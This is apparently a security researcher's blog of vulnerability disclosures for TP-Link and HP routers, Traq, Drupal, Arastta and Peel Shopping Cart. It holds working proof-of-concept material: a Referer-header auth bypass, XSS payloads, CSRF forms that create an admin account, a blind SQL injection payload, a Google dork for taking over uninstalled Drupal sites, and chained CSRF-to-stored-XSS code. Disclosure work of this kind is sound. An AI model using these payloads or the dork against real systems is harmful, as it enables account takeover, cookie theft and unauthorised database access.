Matt Landers

TPLink tl-wr802n Auth bypass

The TPLink tl-wr802n version 4.0 is vulnerable to authentication bypass via altering the referrer attribute.

I did not realize that this vulnerability had been previously disclosed except that the model mentioned above was not included or known about in the initial report. I am linking to securelayer7’s finding first so that you can read it.

http://blog.securelayer7.net/time-to-disable-tp-link-home-wifi-router/

I really wanted to like this device but I couldn’t make myself use it in a public setting. That being said tplink was very fast in providing a beta firmware for me to try which fixed the issue with this specific model.

As this vulnerability has been covered in depth, I will just provide the request screenshots of the Authenticated, Unauthenticated, and Bypass in Burp.

Authenticated

authorizedrequest

Unauthenticated

403forbidden

Next all that is required is to add the Referer: http://192.168.0.1/mainFrame.htm to the request and you will be allowed access to most functions, again check securelayer7’s post about this as it has been tested in depth.

Bypass

auth-bypass

HP R110 Wireless 11n VPN AM Router Credential exposure.

I had recently purchased a HP R110 Wireless 11n VPN AM Router (Product No: J9974A).

223867

I had noticed that it by default communicates via http instead of https, the reason this is an issue is that every single request the user sends after logging in is sent with the login and password in get/post requests to the router.

I apologize for the bad “screenshot” phone camera photo.

The ‘username=admin; password=admin’ shows up in every request after login. I used the default credentials in this example so that i didn’t give my own away.

This might not seem like a big deal but anyone sniffing the network could obtain these credentials.

Traq 3.7.1 multiple vulnerabilities.

=================================================

Synopsis: Traq vulnerable to XSS, Admin account creation CSRF, SQL Injection, Lack of session timeout.
Product: Traq
Version: 3.7.1
Vendor site: https://traq.io/
Researcher: Matt Landers
matt@mjlanders.com
twitter.com/matthewjland
https://mjlanders.org/

=================================================

1: Username enumeration via
http://example.com/home/example/public_html/traq/users/1 = admin
http://example.com/home/example/public_html/traq/users/2 = anonymous
http://example.com/home/example/public_html/traq/users/3 = user etc etc

2: Reflected XSS
A GET reflected XSS appears in the search parameter of the following request.
https://example.com/traq/tickets?search=”>alert(document.domain)

3: CSRF – XSS
This was a post XSS combined with a csrf vulnerability in the email parameter in the following request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/usercp” method=”POST”>
<input type=”hidden” name=”name” value=”Administrator” />
<input type=”hidden” name=”email” value=”tt1kr"><img src=a onerror=alert(document.cookie)>awezh” />
<input type=”hidden” name=”watch_created_tickets” value=”1″ />
<input type=”hidden” name=”locale” value=”enus” />
<input type=”hidden” name=”submit” value=”Save” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

4: CSRF – XSS
This was a post XSS combined with a csrf vulnerability in the name and email parameter in the following request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/admin/users/new?overlay=true” method=”POST”>
<input type=”hidden” name=”username” value=”user1″ />
<input type=”hidden” name=”name” value=”guyj"><img src=a onerror=alert(document.domain)>mztcr” />
<input type=”hidden” name=”password” value=”userpass” />
<input type=”hidden” name=”email” value=”test@testy2.comlgfyr"><img src=a onerror=alert(document.cookie)>jj194″ />
<input type=”hidden” name=”group_id” value=”2″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

5: Admin user creation via CSRF in the same request as the above mentioned item 4. The xss could be used to notify the attacker when the admin triggers the csrf, the admin account is created by setting the group id to 1 in this request.

<html>
<body>
history.pushState(”, ”, ‘/’)
<form action=”http://example.com/home/public_html/traq/admin/users/new?overlay=true” method=”POST”>
<input type=”hidden” name=”username” value=”testadmin” />
<input type=”hidden” name=”name” value=”guy smiley” />
<input type=”hidden” name=”password” value=”testadmin” />
<input type=”hidden” name=”email” value=”testadmin@evil.com” />
<input type=”hidden” name=”group_id” value=”1″ />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

6: SQL Injection via the search parameter, I was able to have sqlmap return with the database current user and database type. The following is the sql injection I used in order to achieve this.

Parameter: search (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind – WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://example.com:80/home/example/public_html/traq/dfgdfg/tickets?search=’) RLIKE (SELECT (CASE WHEN (6383=6383) THEN ” ELSE 0x28 END)) AND (‘yDch’=’yDch&order_by=component.asc

(@DamianEbelties): https://twitter.com/DamianEbelties

Sent this cleaned up payload, thanks!

“%%27)%20and%20updatexml(null,concat(0x0a,version()),null)–%20-”

7: There appears to be no session timeout, admin account stayed logged in for two days.

Drupal takeover

Google dork for populated but not installed versions of Drupal

inurl:install.php select an installation profile

negative intext result: drupal already installed
positive intext result: select an installation profile

If Drupal is populated but not installed, you can install Drupal and become admin.

Arastta 1.6.2 XSS Disclosure

Synopsis: Arastta 1.6.2 xss vulnerability Product: Arastta eCommerce: Free Shopping Cart Version: 1.6.2 Researcher: Matt Landers mattjoeland@gmail.com twitter.com/matthewjland https://mjlanders.org/


The xss that I have found is fairly straight forward.
http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;

Replace 'inserthostnamehere.com' with the server you would like to test.

Peel Shopping Cart 9.0.0 csrf/xss disclosure.

Description: Peel Shopping Cart is prone to various CSRF and XSS vulnerabilities. The csrf example below opens two tabs. The first tab adds an item to the users cart and the second tab modifies the attributes of that item showing a Post XSS.

Also the XSS appears to be persistant as long as the modified cart item, remains in the cart.

Here is a link to a poc, obviously replace all hostnames with the host you would like to test. Packetstormsecurity.com

1 Post XSS + 2 CSRF = FUN!

I seem to be running in to quite a few ‘Post xss’ vulnerabilities lately. I generally try to find a csrf to turn it in to a more valid threat.

A few months ago I was reviewing a popular web based marketplace software and discovered a Post xss when modifying parameters on an in cart item. Yes! I was able to find a csrf that made the Post xss a little more exploitable.

This alone could have been a stopping point, but how do I make sure that there is something in the victims shopping cart to begin with? If the cart is empty our payload will not work. You guessed it! Luckily enough I was able to find another csrf that allowed me to add an item to the victims cart.

The culmination of this was to include both csrf vulnerabilities into the same poc html. The first adds the item to the victims cart and the second modifies the item to insert our xss code. In the poc I had it auto submit both requests opening two separate tabs so that we can see what is happening.

The problem is that the first csrf vulnerability needs to have time to add an item to the cart before the second one tries to modify a parameter on said item to include our payload. For this I used

<form id=”additemcsrf” target=”_blank” form action=”etc etc” and

<form id=”csrftoxss” target=”+blank” form action=”etc etc”

Then to bring them together and add timing so that the item gets added to the cart before we modify it with the second csrf.

document.getElementById(“additemcsrf”).submit();
window.setTimeout( function () { document.forms.csrftoxss.submit()}, 1000);

This will let the item get added with enough time for the second tab to open and our XSS to pop. Also after the item in carts parameters have been modified the xss will execute every time the victim views their shopping cart until the item is removed.

Luckily I only needed two csrf vulnerabilities to make the xss pop however if needed we could chase all around the site until all of the conditions were met via forged forms.

Public disclosure forthcoming after the allocated time frame has ended.

Cheers!